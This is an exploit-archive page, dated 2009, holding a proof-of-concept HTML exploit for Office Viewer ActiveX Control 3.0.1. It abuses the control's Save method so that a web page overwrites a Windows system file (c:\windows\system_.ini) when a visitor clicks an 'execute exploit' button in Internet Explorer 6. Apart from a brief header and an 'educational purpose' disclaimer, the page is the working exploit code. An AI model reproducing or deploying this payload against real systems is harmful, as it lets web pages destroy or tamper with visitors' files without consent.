Office Viewer ActiveX Control 3.0.1 (Save) Remote File Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Office Viewer ActiveX Control 3.0.1 (Save) Remote File Overwrite Exploit
# Published : 2009-01-13
# Author : Houssamix
# Previous Title : Word Viewer OCX 3.2 ActiveX (Save) Remote File Overwrite Exploit
# Next Title : Office Viewer ActiveX Control 3.0.1 Remote File Execution Exploit

=======================================================================================<br>
Author: Houssamix									   <br>
=======================================================================================<br>

 Office Viewer ActiveX Control v 3.0.1 Remote File Overwrite exploit		<br>


 Tested on Windows XP Professional SP2 , with Internet Explorer 6	<br>


=======================================================================================<br>
<HTML>
<BODY>
 <object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>

<SCRIPT>

function Do_it()
 {
     File = "c:\windows\system_.ini"
   hsmx.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================<br>

This was written for educational purpose. Use it at your own risk.<br>
Author will be not responsible for any damage.<br>

# www.Syue.com [2009-01-13]